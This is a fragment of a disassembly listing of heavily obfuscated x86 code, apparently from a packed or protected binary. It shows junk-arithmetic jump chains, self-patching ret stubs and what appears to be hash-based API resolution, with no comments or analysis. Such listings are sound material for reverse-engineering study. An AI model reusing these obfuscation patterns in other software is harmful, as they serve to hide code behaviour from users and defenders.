		and	eax, 3B369E13h
		jmp	loc_450087
sub_4495B9	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_219. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E813

loc_4495D1:				; CODE XREF: sub_43E813+Bj
		jmp	loc_45702D
; END OF FUNCTION CHUNK	FOR sub_43E813
; ---------------------------------------------------------------------------

loc_4495D6:				; CODE XREF: hvvrg7ie:004516E9j
		jge	loc_446378

loc_4495DC:				; CODE XREF: hvvrg7ie:00454BD5j
		jmp	loc_4539E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44432F

loc_4495E1:				; CODE XREF: sub_44432F+9B33j
		jmp	loc_453B86
; END OF FUNCTION CHUNK	FOR sub_44432F
; ---------------------------------------------------------------------------
		mov	edx, [edi]
		jmp	loc_44636F
; ---------------------------------------------------------------------------

loc_4495ED:				; DATA XREF: hvvrg7ie:0044C8EBo
		push	edx
		call	sub_45329F
		mov	eax, 0A4C05BA6h
		call	sub_450C5A
		mov	ds:dword_41D180, eax
		lea	eax, nullsub_29
		jmp	loc_450466
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_44960E:				; CODE XREF: sub_4408AE:loc_44E01Ej
		or	edx, 0BB31F7D1h
		add	edx, 4CD78A5h
		xchg	edx, [esp+0]
		jmp	loc_450F60
; END OF FUNCTION CHUNK	FOR sub_4408AE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_527. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_449623:				; CODE XREF: hvvrg7ie:0044FD79j
		jmp	locret_4589BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_449628:				; CODE XREF: sub_44E533-4812j
		call	sub_440E5A
		mov	eax, 2D912001h
		call	sub_450C5A
		push	offset loc_4432F0
		jmp	nullsub_311
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
		and	ebp, esi
		xor	ebp, 13933812h
		jmp	sub_45426F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447084

loc_44964E:				; CODE XREF: sub_447084+4E32j
		mov	byte ptr [eax],	0C3h
		jmp	loc_454604
; END OF FUNCTION CHUNK	FOR sub_447084
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_449656:				; CODE XREF: sub_447E56:loc_454604j
		pop	edx
		mov	eax, [esp+0]
		push	edx
		nop
		mov	eax, 6FDE1A91h
		call	sub_450C5A
		jmp	loc_44A4CF
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------

loc_44966B:				; CODE XREF: hvvrg7ie:loc_44D599j
		push	12306327h
		pop	ecx
		sub	ecx, 4647504Bh
		rol	ecx, 8
		add	ecx, 0F14469E4h
		or	ecx, 0E70391E4h
		add	ecx, 0ED39F5h
		xchg	ecx, [esp]
		jmp	loc_44633E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_449694:				; CODE XREF: sub_446EC2:loc_446BA5j
		add	ebx, 6CF0CBA5h
		mov	ebx, [ebx]
		xchg	ebx, [esp-4+arg_0]
		retn
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_4496A0:				; CODE XREF: sub_456CD4-14B01j
		jmp	loc_43F48C
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4496A5:				; CODE XREF: sub_43F227+3F8Aj
		not	esi
		mov	[edi], ebp
		jmp	loc_450BA4
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		push	16D280A6h
		pop	ecx
		add	ecx, 5BCE8F65h
		and	ecx, 0D7E38E80h
		add	ecx, 0ADA2A034h
		xchg	ecx, [esp]
		jmp	loc_441E3A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_4496CE:				; CODE XREF: sub_448100:loc_440E78j
		jle	loc_456914

loc_4496D4:				; CODE XREF: hvvrg7ie:loc_450A55j
		not	eax
		xchg	esi, [edi]
		test	ebx, eax
		jmp	loc_43BB20
; END OF FUNCTION CHUNK	FOR sub_448100

; =============== S U B	R O U T	I N E =======================================



sub_4496DF	proc near		; CODE XREF: sub_441A70+12A2Fp
					; hvvrg7ie:0045585Fj
		xchg	eax, [esp+0]
		pop	eax
		mov	ds:dword_4562D0, edx

loc_4496E9:				; CODE XREF: sub_455B7D+2j
					; sub_456535+6j
		xchg	eax, edx
		call	sub_446A16
		jmp	nullsub_74
sub_4496DF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4496F4:				; CODE XREF: hvvrg7ie:00455B6Dj
		jnz	loc_43B484

; =============== S U B	R O U T	I N E =======================================



sub_4496FA	proc near		; CODE XREF: sub_43D47E-23C9p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C506 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		push	offset loc_43FC9B

loc_449707:				; CODE XREF: hvvrg7ie:loc_440175j
		jmp	loc_43C506
sub_4496FA	endp

; ---------------------------------------------------------------------------

loc_44970C:				; CODE XREF: hvvrg7ie:loc_453886j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_44970D:				; CODE XREF: sub_44191F+A46Aj
		jmp	loc_4390CE
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446428

loc_449712:				; CODE XREF: sub_446428+14j
		jmp	nullsub_25
; END OF FUNCTION CHUNK	FOR sub_446428
; ---------------------------------------------------------------------------
		adc	eax, 7CF2F9A9h
		jmp	loc_43F1B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A003

loc_449722:				; CODE XREF: sub_45A003:loc_452ACEj
		push	edx
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+10h+var_10]
		call	sub_442BA8
; END OF FUNCTION CHUNK	FOR sub_45A003
; START	OF FUNCTION CHUNK FOR sub_4435FA

loc_44972E:				; CODE XREF: hvvrg7ie:loc_43D23Aj
					; sub_4435FA+16722j
		pop	esi
; END OF FUNCTION CHUNK	FOR sub_4435FA
; START	OF FUNCTION CHUNK FOR sub_443452

loc_44972F:				; CODE XREF: hvvrg7ie:00442EA8j
					; sub_443452+6j ...
		jmp	loc_44D908
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4435FA

loc_449734:				; CODE XREF: sub_4403D4-516j
					; sub_4435FA+9j
		pop	ecx
		pop	ebp

locret_449736:				; CODE XREF: sub_459B2D:loc_44950Aj
		retn
; END OF FUNCTION CHUNK	FOR sub_4435FA
; ---------------------------------------------------------------------------

loc_449737:				; CODE XREF: hvvrg7ie:00451164j
		jmp	loc_4506AA

; =============== S U B	R O U T	I N E =======================================



sub_44973C	proc near		; CODE XREF: sub_4413FF:loc_439AF9j
					; sub_45190C:loc_43D8B5p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439A8A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443551 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004475E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A837 SIZE 00000005 BYTES

		push	edx

loc_44973D:				; CODE XREF: sub_43B6A5+3559j
		jmp	loc_4475E2
sub_44973C	endp

; ---------------------------------------------------------------------------

loc_449742:				; CODE XREF: hvvrg7ie:00446274j
		push	edx
		rol	edx, 9
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_449746:				; CODE XREF: sub_44CB64-6909j
		add	edx, 48D16B7Ch
		sub	edx, 4A1B64C6h
		xor	edx, 0ECA79320h
		jmp	loc_443D15
; END OF FUNCTION CHUNK	FOR sub_44CB64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44975D:				; CODE XREF: sub_44D2F8+2094j
		sbb	ebx, ebp
		push	0C1DC81BCh

loc_449764:				; CODE XREF: sub_4569C6:loc_446536j
		and	edi, ecx
		jz	loc_4477A8

loc_44976C:				; CODE XREF: sub_44D2F8:loc_44C470j
		push	242BA3ACh
		pop	eax
		and	eax, ds:4000F7h
		or	eax, 0A7BE60C8h
		jmp	loc_451CA0
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_449783:				; CODE XREF: hvvrg7ie:00441E9Ej
		sub	ebx, eax

; =============== S U B	R O U T	I N E =======================================



sub_449785	proc near		; CODE XREF: hvvrg7ie:00453AD4p

; FUNCTION CHUNK AT 0043AD13 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447506 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AFA9 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		lea	eax, dword_43A978
		jmp	loc_43AD13
sub_449785	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414D3

loc_449794:				; CODE XREF: sub_4414D3-65FBj
		pop	eax
		sub	eax, 116F48D7h
		add	eax, 31818F72h
		test	eax, 800000h
		jmp	loc_43AD68
; END OF FUNCTION CHUNK	FOR sub_4414D3
; ---------------------------------------------------------------------------
		mov	ds:dword_41D0FC, eax
		lea	eax, nullsub_356
		mov	byte ptr [eax],	0C3h
		jmp	loc_43EEA4
; ---------------------------------------------------------------------------
		pop	edx
		jmp	loc_457003
; ---------------------------------------------------------------------------

loc_4497C6:				; CODE XREF: hvvrg7ie:0044C587j
		add	eax, 340577C6h
		call	sub_44059F
		mov	ds:off_41D018, eax
		lea	eax, sub_445CCD
		mov	byte ptr [eax],	0C3h
		jmp	sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_4497E5:				; CODE XREF: sub_445CCDj
		xchg	ebp, [esp+0]
		mov	edx, ebp
		jmp	loc_450184
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_4497EF:				; CODE XREF: hvvrg7ie:0044D856j
		jl	loc_43F916

loc_4497F5:				; CODE XREF: hvvrg7ie:0044A483j
		jmp	loc_43CB2F
; ---------------------------------------------------------------------------
		test	eax, 0CDED82ECh
		jmp	loc_455028
; ---------------------------------------------------------------------------

loc_449805:				; CODE XREF: hvvrg7ie:0045B008j
		jns	loc_43ACEA

; =============== S U B	R O U T	I N E =======================================



sub_44980B	proc near		; CODE XREF: hvvrg7ie:0043FA77p

; FUNCTION CHUNK AT 0043B3A7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043C6E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CBAA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00440466 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044313F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044CAE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D31B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044E6F6 SIZE 00000012 BYTES

		xchg	edx, [esp+0]
		pop	edx
		test	al, al
		jz	loc_43B3A7
		jmp	loc_43C6E8
sub_44980B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44981C:				; CODE XREF: hvvrg7ie:0044AA7Bj
		or	ebp, 497A49DFh
		jmp	loc_4586AF
; ---------------------------------------------------------------------------

loc_449827:				; CODE XREF: hvvrg7ie:0043E56Aj
		jnz	loc_43BF42
		jmp	loc_43D1D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_449832:				; CODE XREF: sub_44388C+165E7j
		jz	loc_45A0CC
		jmp	loc_453196
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 1Ah
		mov	ds:dword_452320, eax
		retn
; ---------------------------------------------------------------------------

loc_449848:				; CODE XREF: hvvrg7ie:0044FE54j
		jmp	loc_43AA7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_44984D:				; CODE XREF: sub_455B9C-149DDj
					; hvvrg7ie:loc_45031Aj
		rol	eax, 1Ah
		jmp	loc_44C861
; END OF FUNCTION CHUNK	FOR sub_455B9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_449855:				; CODE XREF: sub_45A234:loc_43A615j
		jnz	loc_458475
; END OF FUNCTION CHUNK	FOR sub_45A234
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_44985B:				; CODE XREF: sub_43E60A:loc_43A656j
		jmp	loc_43B568
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
		ror	edx, 11h
		shr	ebp, 0Bh
		jmp	loc_458475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451442

loc_44986B:				; CODE XREF: sub_451442:loc_440484j
		xor	edx, 2AD599D5h
		sub	edx, 0D4922E73h
		add	edx, 83B9BB4Dh
		xchg	edx, [esp+4+var_4]
		jmp	loc_43B87B
; END OF FUNCTION CHUNK	FOR sub_451442

; =============== S U B	R O U T	I N E =======================================



sub_449885	proc near		; DATA XREF: sub_44E533-10871o

; FUNCTION CHUNK AT 00443DCA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004451ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044770C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044BD8E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044FEE4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045188E SIZE 00000005 BYTES

		call	sub_450C5A
		push	ebx
		push	0E70FB552h
		pop	ebx
		xor	ebx, 685CA5C9h
		jmp	loc_44FEE4
sub_449885	endp


; =============== S U B	R O U T	I N E =======================================



sub_44989C	proc near		; CODE XREF: sub_43E128+BE8Cp
					; hvvrg7ie:00458284j

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439A40 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CB67 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D38B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EF8C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00445C98 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044A1F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ECF3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00450E90 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452AE0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453CCC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455DBA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455F44 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00456F51 SIZE 00000019 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		sub	eax, 324DBB03h
		ror	eax, 2
		jmp	loc_452AE0
sub_44989C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4498AE	proc near		; CODE XREF: sub_455B50+Fj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BB40 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00442C84 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004540CC SIZE 00000005 BYTES

		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		push	0A5463A75h
		pop	edx
		and	edx, 0AA97459Ah
		jmp	loc_442C84
sub_4498AE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4498C5:				; CODE XREF: sub_43F227+10FE2j
		jl	loc_441F66
		mov	ebx, [ebp+0]

loc_4498CE:				; CODE XREF: sub_43F227:loc_451453j
		lea	eax, [ebp-26Fh]
		push	offset loc_43C958
		jmp	loc_43AD63
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_4498DE	proc near		; DATA XREF: sub_45541B:loc_44BDCAo
		add	ecx, 0AA72A0F2h
		xchg	ecx, [esp+0]
		jmp	sub_448768
sub_4498DE	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_355. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		cdq
		xor	edi, 0E540687Eh
		jmp	sub_4465E5
; ---------------------------------------------------------------------------

loc_4498F9:				; CODE XREF: hvvrg7ie:0044BB60j
		xchg	esi, ecx

; =============== S U B	R O U T	I N E =======================================



sub_4498FB	proc near		; CODE XREF: sub_4398B7+F571p

; FUNCTION CHUNK AT 004417F2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004518C5 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452047 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452C60 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004582CB SIZE 00000012 BYTES

		xchg	edi, [esp+0]

loc_4498FE:				; CODE XREF: sub_456CD4:loc_43DBA0j
		pop	edi
		mov	eax, [eax]
		mov	edx, [ebp-4]
		mov	byte ptr [eax+edx], 0
		inc	dword ptr [ebp-4]
		jmp	loc_4582CB
sub_4498FB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43931C

loc_449910:				; CODE XREF: sub_43931C+1666Ej
		test	ebp, ecx
		jmp	loc_4413C1
; END OF FUNCTION CHUNK	FOR sub_43931C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_449917:				; CODE XREF: sub_458F33-1D114j
		jle	loc_44599D
		mov	[ecx], ebp
		jmp	loc_457691
; END OF FUNCTION CHUNK	FOR sub_458F33

; =============== S U B	R O U T	I N E =======================================



sub_449924	proc near		; CODE XREF: sub_43B9C9+Ap
					; hvvrg7ie:004400A8j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044B6B0 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xchg	edi, [esp-4+arg_0]
		jmp	loc_44B6B0
sub_449924	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440402

loc_449930:				; CODE XREF: sub_440402+19785j
		push	edx
		push	eax
		mov	eax, [ebp-18h]
		shl	eax, 2
		jmp	loc_44D499
; END OF FUNCTION CHUNK	FOR sub_440402
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44934B

loc_44993D:				; CODE XREF: sub_44934B:loc_43E6D1j
		mov	eax, edx
		call	sub_43C836
		mov	eax, [esp+0]
		push	ebx
		jmp	loc_44B8C9
; END OF FUNCTION CHUNK	FOR sub_44934B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BE8

loc_44994D:				; CODE XREF: sub_445BE8:loc_455973j
		jl	loc_44B855

loc_449953:				; CODE XREF: hvvrg7ie:0045B4F2j
		jmp	loc_44644D
; END OF FUNCTION CHUNK	FOR sub_445BE8
; ---------------------------------------------------------------------------
		not	ebx
		jmp	loc_44B84D
; ---------------------------------------------------------------------------

loc_44995F:				; DATA XREF: sub_4551D4+2903o
		push	0D9F25D0Bh
		pop	edx

loc_449965:				; CODE XREF: hvvrg7ie:loc_43B355j
		xor	edx, 0E0E71FE0h
		add	edx, 7BAC38B3h

loc_449971:				; CODE XREF: hvvrg7ie:loc_43F6F1j
		sub	edx, 51F8076Ah
		cmp	edx, 94A561D0h
		jmp	loc_451062
; ---------------------------------------------------------------------------

loc_449982:				; CODE XREF: hvvrg7ie:0043A3BDj
		jnz	loc_4482DB
		jmp	loc_451D19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_44998D:				; CODE XREF: sub_45A7E8-B46Dj
		jnp	loc_43F200

loc_449993:				; CODE XREF: sub_45A7E8:loc_45B567j
		push	70076E9Bh
		pop	eax
		or	eax, 5A8BDC67h
		jmp	loc_441820
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; ---------------------------------------------------------------------------

loc_4499A4:				; CODE XREF: hvvrg7ie:loc_43C983j
		xor	eax, eax
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4499A7	proc near		; DATA XREF: sub_4554E8o

; FUNCTION CHUNK AT 0043C5A2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043F5A2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00454E29 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045723B SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_43C5A2
sub_4499A7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_4499AF:				; CODE XREF: sub_43D30A:loc_45A40Fj
		jz	loc_443D7D
		jmp	loc_450B53
; END OF FUNCTION CHUNK	FOR sub_43D30A
; ---------------------------------------------------------------------------

loc_4499BA:				; CODE XREF: hvvrg7ie:0043DC21j
		mov	al, [eax]
		push	offset sub_4569C6
		jmp	locret_43D1F0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_153. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F65

loc_4499C7:				; CODE XREF: sub_451F65-741Ej
		jmp	nullsub_251
; END OF FUNCTION CHUNK	FOR sub_451F65
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439529

loc_4499CC:				; CODE XREF: sub_439529-466j
		pop	esi
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_4489AE
		mov	eax, 0A11F455Ah
		call	sub_458A13
		mov	ds:off_41D1E8, eax
		lea	eax, loc_4390B8
		jmp	loc_447A82
; END OF FUNCTION CHUNK	FOR sub_439529
; ---------------------------------------------------------------------------
		mov	eax, 0C0F1A028h
		call	sub_450C5A
		mov	ds:dword_41D144, eax
		lea	eax, nullsub_5
		mov	byte ptr [eax],	0C3h
		jmp	loc_43E99C
; ---------------------------------------------------------------------------

loc_449A0F:				; CODE XREF: hvvrg7ie:00443AA5j
		mov	eax, [esp]
		call	sub_44905F
; START	OF FUNCTION CHUNK FOR sub_45ACF1

loc_449A17:				; CODE XREF: sub_45ACF1+6j
		jmp	loc_44F690
; END OF FUNCTION CHUNK	FOR sub_45ACF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_449A1C:				; CODE XREF: sub_43E128+E7Ej
		sub	eax, 324DBB03h
		ror	eax, 2
		add	eax, 0F67D46BAh
		ror	eax, 12h
		add	eax, 0ADC00C10h
		xor	eax, 4E86B5CAh
		mov	edx, [esp-4+arg_0]
		push	eax
		jmp	loc_45B4F7
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------

loc_449A43:				; CODE XREF: hvvrg7ie:004485DCj
		mov	eax, edi
		pop	edi
		xor	eax, 51151BB0h
		add	eax, 80D72BEh
		push	offset loc_43CDEB
		jmp	locret_45A113
; ---------------------------------------------------------------------------

loc_449A5C:				; CODE XREF: hvvrg7ie:00445CC8j
		shl	edx, 18h
		js	loc_4475F3
		or	esi, 2E33907Dh
		jmp	loc_43EDEB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_449A70:				; CODE XREF: sub_444B29:loc_43C1DFj
		push	eax
		mov	eax, [ebp-4]
		mov	eax, [eax+3Ch]
		cdq
		push	offset loc_4482EA
		jmp	loc_4464B1
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_449A82:				; CODE XREF: sub_43F227:loc_447AB0j
		and	edi, esi
		sbb	ebp, ebx
		jmp	loc_450FA0
; ---------------------------------------------------------------------------

loc_449A8B:				; CODE XREF: sub_43F227:loc_450BAAj
		cmp	dword ptr [ebp-4], 5
		jnz	loc_450FA0
		jmp	loc_439833
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_449A9A:				; CODE XREF: hvvrg7ie:00452F9Ej
		pushf
		mov	[ecx], ebp
		xor	ebx, ebp

loc_449A9F:				; CODE XREF: hvvrg7ie:004553A0j
		sub	ecx, 8A9E4DC5h
		add	ecx, 3B0B9609h
		mov	ecx, [ecx]
		movzx	edx, byte ptr [ecx+edx]
		jmp	loc_448220
; ---------------------------------------------------------------------------

loc_449AB6:				; CODE XREF: hvvrg7ie:loc_4477F5j
		jnz	loc_44930B
		jmp	loc_44A98F
; ---------------------------------------------------------------------------

locret_449AC1:				; CODE XREF: hvvrg7ie:00445081j
		retn
; ---------------------------------------------------------------------------

loc_449AC2:				; CODE XREF: hvvrg7ie:00451CCDj
		jmp	loc_45A0D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_449AC7:				; CODE XREF: sub_44E3B3-6381j
		jmp	loc_455FC5
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439549

loc_449ACC:				; CODE XREF: sub_439549+D3D7j
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_439549

; =============== S U B	R O U T	I N E =======================================



sub_449AD1	proc near		; DATA XREF: hvvrg7ie:0043EBACo

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440A66 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00440FBB SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004465BE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D4B7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F976 SIZE 0000000E BYTES

		push	esi
		push	0B96202Ch
		pop	esi
		add	esi, 1042D4ADh
		sub	esi, 5F1A5212h
		cmp	esi, 0FEA365B9h
		jmp	loc_44D4B7
sub_449AD1	endp

; ---------------------------------------------------------------------------
		mov	ds:dword_41D1B8, eax
		lea	eax, nullsub_539
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_539
; ---------------------------------------------------------------------------

loc_449B03:				; CODE XREF: hvvrg7ie:00454BC9j
		mov	eax, [esp]
		push	edx
		call	sub_447162
		push	97E90932h
		pop	eax
		jmp	loc_44163C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_449B17:				; CODE XREF: sub_454099:loc_44F240j
		test	edx, 400000h
		jmp	loc_43BAED
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_449B22:				; CODE XREF: sub_4544DD-16EC1j
		jnz	loc_4475AB
; END OF FUNCTION CHUNK	FOR sub_4544DD
; START	OF FUNCTION CHUNK FOR sub_43D2D8

loc_449B28:				; CODE XREF: sub_43D2D8+6j
		jmp	loc_45855C
; END OF FUNCTION CHUNK	FOR sub_43D2D8
; ---------------------------------------------------------------------------
		shr	eax, 12h
		jo	loc_440BBD
		pop	ebp
		jmp	loc_4475AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_449B3C:				; CODE XREF: sub_450246-141EEj
		jge	loc_4564BA
		jmp	loc_444F16
; END OF FUNCTION CHUNK	FOR sub_450246

; =============== S U B	R O U T	I N E =======================================



sub_449B47	proc near		; DATA XREF: sub_43933B+7o

; FUNCTION CHUNK AT 00457400 SIZE 00000015 BYTES

		call	sub_454E54
		push	41B783F8h
		pop	eax
		add	eax, 38524A2Dh
		jmp	loc_457400
sub_449B47	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_449B5D:				; CODE XREF: hvvrg7ie:0045033Dj
		jge	loc_44705B
		adc	edx, esi

; =============== S U B	R O U T	I N E =======================================



sub_449B65	proc near		; CODE XREF: hvvrg7ie:0044D91Cp

; FUNCTION CHUNK AT 0043962B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004463AA SIZE 00000003 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		jmp	loc_43962B
sub_449B65	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_449B6E:				; DATA XREF: sub_44BCAE:loc_459FCBo
		push	edi
		push	7CFB78CCh
		pop	edi
		rol	edi, 17h
		add	edi, 9A0562D3h
		xchg	edi, [esp]
		jmp	loc_4473A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_449B86:				; CODE XREF: sub_453BA4-D4C0j
		push	1F4FCBA1h
		pop	ecx
		sub	ecx, 93C02E47h
		xor	ecx, 0F9AD36BEh
		and	ecx, 8F0E0F6Bh
		jmp	loc_451AF3
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_449BA3:				; CODE XREF: sub_44616F+5E27j
		rol	ebx, 9
		jmp	loc_453ABE
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------

loc_449BAB:				; CODE XREF: hvvrg7ie:00456811j
		jz	loc_448600
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_449BB1:				; CODE XREF: sub_43D531:loc_443586j
		xor	eax, 0AA17CFD6h
		add	eax, ebp
		add	eax, 47C40185h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44D94A
